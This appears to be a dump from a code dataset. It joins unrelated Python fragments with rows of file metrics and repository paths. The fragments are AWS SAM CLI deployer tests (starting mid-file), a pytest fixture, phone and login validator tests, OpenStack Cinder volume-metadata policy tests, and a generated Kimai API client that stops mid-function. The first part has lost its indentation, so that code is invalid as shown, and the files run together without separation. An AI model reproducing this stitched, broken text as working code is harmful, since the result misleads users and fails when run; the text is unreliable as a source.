"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
        # There are 2 sleep calls per exception (the backoff plus the regular one at 0)
self.assertEqual(patched_time.call_count, 9)
self.assertEqual(
patched_time.call_args_list,
[call(0.5), call(0.5), call(2.0), call(0), call(4.0), call(0), call(0.5), call(2.0), call(0)],
)
self.assertEqual(patched_pow.call_count, 3)
self.assertEqual(patched_pow.call_args_list, [call(2, 1), call(2, 2), call(2, 1)])
def test_check_stack_status(self):
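        # _check_stack_not_in_progress should be True only for terminal stack states.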
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("REVIEW_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE_CLEANUP_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_IN_PROGRESS"), False)
self.assertEqual(
self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS"), False
)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_IN_PROGRESS"), False)
@patch("time.sleep")
def test_wait_for_execute(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
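        # CREATE and UPDATE are the only supported changeset types here;
        # any other value is expected to raise a RuntimeError.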
self.deployer.wait_for_execute("test", "CREATE", False)
self.deployer.wait_for_execute("test", "UPDATE", True)
with self.assertRaises(RuntimeError):
self.deployer.wait_for_execute("test", "DESTRUCT", False)
self.deployer._client.get_waiter = MagicMock(
return_value=MockCreateUpdateWaiter(
ex=WaiterError(
name="create_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(DeployFailedError):
self.deployer.wait_for_execute("test", "CREATE", False)
def test_create_and_wait_for_changeset(self):
self.deployer.create_changeset = MagicMock(return_value=({"Id": "test"}, "create"))
self.deployer.wait_for_changeset = MagicMock()
self.deployer.describe_changeset = MagicMock()
result = self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(result, ({"Id": "test"}, "create"))
def test_create_and_wait_for_changeset_exception(self):
self.deployer.create_changeset = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Something Wrong"}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployFailedError):
self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_get_stack_outputs(self):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_get_stack_outputs_no_echo(self, mock_pprint_columns):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(
outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test", echo=False)
)
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
self.assertEqual(mock_pprint_columns.call_count, 0)
def test_get_stack_outputs_no_outputs_no_exception(self):
outputs = {"Stacks": [{"SomeOtherKey": "Value"}]}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(None, self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
def test_get_stack_outputs_exception(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="describe_stacks")
)
with self.assertRaises(DeployStackOutPutFailedError):
self.deployer.get_stack_outputs(stack_name="test")
@patch("time.sleep")
def test_wait_for_execute_no_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=None)
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 0)
@patch("time.sleep")
def test_wait_for_execute_with_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=outputs["Stacks"][0]["Outputs"])
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 1)
def test_sync_update_stack(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.update_stack.call_count, 1)
self.deployer._client.update_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_update_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.update_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_sync_create_stack(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_stack.call_count, 1)
self.deployer._client.create_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_create_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.create_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_process_kwargs(self):
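        # The None positional argument is presumably the s3_uploader slot; the test
        # only checks that the optional values above are merged into kwargs.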
kwargs = {"Capabilities": []}
capabilities = ["CAPABILITY_IAM"]
role_arn = "role-arn"
notification_arns = ["arn"]
expected = {
"Capabilities": ["CAPABILITY_IAM"],
"RoleARN": "role-arn",
"NotificationARNs": ["arn"],
}
result = self.deployer._process_kwargs(kwargs, None, capabilities, role_arn, notification_arns)
self.assertEqual(expected, result)
| 45.654676 | 120 | 0.514795 | 4,633 | 57,114 | 6.090006 | 0.075329 | 0.059543 | 0.029984 | 0.021549 | 0.871274 | 0.843346 | 0.806131 | 0.777671 | 0.744852 | 0.725536 | 0 | 0.010216 | 0.374409 | 57,114 | 1,250 | 121 | 45.6912 | 0.779457 | 0.017001 | 0 | 0.560699 | 0 | 0 | 0.186398 | 0.04282 | 0 | 0 | 0 | 0 | 0.08559 | 1 | 0.048035 | false | 0.000873 | 0.012227 | 0.000873 | 0.067249 | 0.026201 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c7ad4336fb8d3d30bd34b2831765abf4b8f8e03 | 40 | py | Python | python/eskapade/data_mimic/__init__.py | mbaak/Eskapade | 00c8f6ca52eb5b738b4268257e277dab71b804cb | [
"Apache-2.0"
] | 16 | 2016-10-10T08:39:30.000Z | 2020-12-22T01:00:56.000Z | python/eskapade/data_mimic/__init__.py | mbaak/Eskapade | 00c8f6ca52eb5b738b4268257e277dab71b804cb | [
"Apache-2.0"
] | null | null | null | python/eskapade/data_mimic/__init__.py | mbaak/Eskapade | 00c8f6ca52eb5b738b4268257e277dab71b804cb | [
"Apache-2.0"
] | 6 | 2017-06-14T12:01:41.000Z | 2018-04-03T17:01:04.000Z | from eskapade.data_mimic.links import *
| 20 | 39 | 0.825 | 6 | 40 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5c9c6540f1bf069cc8ad0527adf2f7e03aba244 | 141 | py | Python | ps_signal/interfaces/cli/__init__.py | golgor/ps_signal | 0dc93bd3a88d30778968eb102435ffc8cb69a5fb | [
"MIT"
] | 1 | 2021-08-02T22:46:34.000Z | 2021-08-02T22:46:34.000Z | ps_signal/interfaces/cli/__init__.py | golgor/ps-signal | 0dc93bd3a88d30778968eb102435ffc8cb69a5fb | [
"MIT"
] | 7 | 2020-07-04T13:14:12.000Z | 2020-07-07T12:27:30.000Z | ps_signal/interfaces/cli/__init__.py | golgor/ps_signal | 0dc93bd3a88d30778968eb102435ffc8cb69a5fb | [
"MIT"
] | null | null | null | """Package that implements a CLI. Import structure will make the entry point
of this package to :func:`.cli.run_cli`.
"""
from .cli import *
| 28.2 | 76 | 0.730496 | 23 | 141 | 4.434783 | 0.782609 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156028 | 141 | 4 | 77 | 35.25 | 0.857143 | 0.808511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5d37be981e99b36e909f2ac73f9cab68780b13f | 62 | py | Python | calculations/conftest.py | gabrielfior/etf-portfolio-backtesting | 15ad62742cc2efe7f3ecb915481d68069ab0b4df | [
"MIT"
] | null | null | null | calculations/conftest.py | gabrielfior/etf-portfolio-backtesting | 15ad62742cc2efe7f3ecb915481d68069ab0b4df | [
"MIT"
] | null | null | null | calculations/conftest.py | gabrielfior/etf-portfolio-backtesting | 15ad62742cc2efe7f3ecb915481d68069ab0b4df | [
"MIT"
] | 1 | 2021-11-20T17:25:15.000Z | 2021-11-20T17:25:15.000Z | import pytest
@pytest.fixture()
def engine():
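    # Placeholder fixture: tests requesting `engine` get this dummy string for now.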
return 'oi' | 12.4 | 17 | 0.677419 | 8 | 62 | 5.25 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177419 | 62 | 5 | 18 | 12.4 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0.031746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
d5f91bd60e22187b2d5e5f00628065d4c4a40f70 | 544 | py | Python | tests/test_check.py | kosyachniy/lib | 4174eb7b91b2c5908b47b353cc55cc617b74799f | [
"MIT"
] | null | null | null | tests/test_check.py | kosyachniy/lib | 4174eb7b91b2c5908b47b353cc55cc617b74799f | [
"MIT"
] | null | null | null | tests/test_check.py | kosyachniy/lib | 4174eb7b91b2c5908b47b353cc55cc617b74799f | [
"MIT"
] | null | null | null | from libdev.check import fake_phone, fake_login
def test_phone():
    assert fake_phone(79000000001)
    assert fake_phone('+79121231234')
    assert not fake_phone('79697366730')
def test_mail():
assert fake_login('test@check.ru') == True
assert fake_login('ASD@Qwe.rTy') == True
assert fake_login('ads@123.ru') == True
assert fake_login('polozhev@mail.ru') == False
def test_name():
assert fake_login('Тест') == True
assert fake_login('aSdR') == True
assert fake_login('Алексей') == False
| 28.631579 | 50 | 0.681985 | 75 | 544 | 4.746667 | 0.36 | 0.280899 | 0.275281 | 0.266854 | 0.117978 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080178 | 0.174632 | 544 | 18 | 51 | 30.222222 | 0.712695 | 0 | 0 | 0 | 0 | 0 | 0.161765 | 0 | 0 | 0 | 0 | 0 | 0.714286 | 1 | 0.214286 | true | 0 | 0.071429 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
912a994f74b08b823bf6d645bc4d6befcd9e0884 | 44 | py | Python | grakn/__init__.py | sheikheddy/grakn-python | ef81bc7961ba3b39dd9d3ca9136b8bcbcdf61757 | [
"Apache-2.0"
] | null | null | null | grakn/__init__.py | sheikheddy/grakn-python | ef81bc7961ba3b39dd9d3ca9136b8bcbcdf61757 | [
"Apache-2.0"
] | null | null | null | grakn/__init__.py | sheikheddy/grakn-python | ef81bc7961ba3b39dd9d3ca9136b8bcbcdf61757 | [
"Apache-2.0"
] | null | null | null | from grakn.client import Client, GraknError
| 22 | 43 | 0.840909 | 6 | 44 | 6.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 44 | 1 | 44 | 44 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc01467f7aade8766a7aa1e5e1404d70a701d735 | 44 | py | Python | test/__init__.py | kallyas/PythonAlgorithms | e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80 | [
"MIT"
] | 1 | 2022-02-23T19:22:44.000Z | 2022-02-23T19:22:44.000Z | test/__init__.py | kallyas/PythonAlgorithms | e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80 | [
"MIT"
] | null | null | null | test/__init__.py | kallyas/PythonAlgorithms | e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80 | [
"MIT"
] | null | null | null | from maths import *
from conversion import * | 22 | 24 | 0.795455 | 6 | 44 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 44 | 2 | 24 | 22 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc0d993035218ea3b677670cc46074f57adc4f33 | 8,397 | py | Python | cinder/tests/unit/policies/test_volume_metadata.py | lightsey/cinder | e03d68e42e57a63f8d0f3e177fb4287290612b24 | [
"Apache-2.0"
] | 3 | 2015-04-02T21:44:36.000Z | 2016-04-29T21:19:04.000Z | cinder/tests/unit/policies/test_volume_metadata.py | lightsey/cinder | e03d68e42e57a63f8d0f3e177fb4287290612b24 | [
"Apache-2.0"
] | 3 | 2016-04-29T21:45:26.000Z | 2016-05-04T19:41:23.000Z | cinder/tests/unit/policies/test_volume_metadata.py | lightsey/cinder | e03d68e42e57a63f8d0f3e177fb4287290612b24 | [
"Apache-2.0"
] | 4 | 2016-01-27T00:25:52.000Z | 2021-03-25T19:54:08.000Z | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from six.moves import http_client
from cinder.tests.unit.policies import test_base
from cinder.volume import api as volume_api
# TODO(yikun): The following policy test cases should be added:
# * IMAGE_METADATA_POLICY
class VolumePolicyTests(test_base.CinderPolicyTests):
def test_admin_can_get_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(admin_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
def test_owner_can_get_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(user_context, path, 'GET')
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v', res_meta['k'])
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_get_metadata_for_others(self, mock_volume):
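        # Patch the volume lookup to return the owner's volume so the request
        # reaches the policy check, which should reject the non-owner with 403.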
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
response = self._get_request_response(non_owner_context, path, 'GET')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
def test_admin_can_create_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_create_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_create_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k1": "v1"}}
response = self._get_request_response(non_owner_context, path, 'POST',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
def test_admin_can_delete_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': admin_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(admin_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
def test_owner_can_delete_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': user_context.project_id, 'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(user_context, path, 'DELETE')
self.assertEqual(http_client.OK, response.status_int)
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_delete_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata/%(key)s' % {
'project_id': non_owner_context.project_id,
'volume_id': volume.id,
'key': 'k'
}
response = self._get_request_response(non_owner_context, path,
'DELETE')
self.assertEqual(http_client.FORBIDDEN, response.status_int)
def test_admin_can_update_metadata(self):
admin_context = self.admin_context
volume = self._create_fake_volume(admin_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': admin_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(admin_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
def test_owner_can_update_metadata(self):
user_context = self.user_context
volume = self._create_fake_volume(user_context, metadata={"k": "v"})
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': user_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(user_context, path, 'PUT',
body=body)
self.assertEqual(http_client.OK, response.status_int)
res_meta = response.json_body['metadata']
self.assertIn('k', res_meta)
self.assertEqual('v2', res_meta['k'])
@mock.patch.object(volume_api.API, 'get')
def test_owner_cannot_update_metadata_for_others(self, mock_volume):
owner_context = self.user_context
non_owner_context = self.other_user_context
volume = self._create_fake_volume(owner_context, metadata={"k": "v"})
mock_volume.return_value = volume
path = '/v3/%(project_id)s/volumes/%(volume_id)s/metadata' % {
'project_id': non_owner_context.project_id, 'volume_id': volume.id
}
body = {"metadata": {"k": "v2"}}
response = self._get_request_response(non_owner_context, path, 'PUT',
body=body)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
| 42.624365 | 78 | 0.642849 | 1,054 | 8,397 | 4.804554 | 0.126186 | 0.063981 | 0.047393 | 0.054502 | 0.85545 | 0.85545 | 0.85545 | 0.847749 | 0.84064 | 0.82425 | 0 | 0.004212 | 0.236632 | 8,397 | 196 | 79 | 42.841837 | 0.785803 | 0.074789 | 0 | 0.676056 | 0 | 0 | 0.135595 | 0.078958 | 0 | 0 | 0 | 0.005102 | 0.140845 | 1 | 0.084507 | false | 0 | 0.028169 | 0 | 0.119718 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc46b9ef63e008faf0b8892eba241d552e179d65 | 10,784 | py | Python | kimai_python/api/tag_api.py | kbancerz/kimai-python | c5401acca8fe8cfa7db486dee5a215bd7daea95b | [
"MIT"
] | 6 | 2019-12-19T16:01:58.000Z | 2022-01-19T18:10:16.000Z | kimai_python/api/tag_api.py | kbancerz/kimai-python | c5401acca8fe8cfa7db486dee5a215bd7daea95b | [
"MIT"
] | 4 | 2020-05-16T23:33:15.000Z | 2021-07-06T20:53:32.000Z | kimai_python/api/tag_api.py | kbancerz/kimai-python | c5401acca8fe8cfa7db486dee5a215bd7daea95b | [
"MIT"
] | 3 | 2020-05-16T23:14:13.000Z | 2021-06-30T08:53:11.000Z | # coding: utf-8
"""
Kimai 2 - API Docs
JSON API for the Kimai 2 time-tracking software. Read more about its usage in the [API documentation](https://www.kimai.org/documentation/rest-api.html) and then download a [Swagger file](doc.json) for import e.g. in Postman. Be aware: it is not yet considered stable and BC breaks might happen, especially when using code generation. The order of JSON attributes is not guaranteed. # noqa: E501
OpenAPI spec version: 0.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from kimai_python.api_client import ApiClient
class TagApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def api_tags_get(self, **kwargs): # noqa: E501
"""Fetch all existing tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_tags_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Search term to filter tag list
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
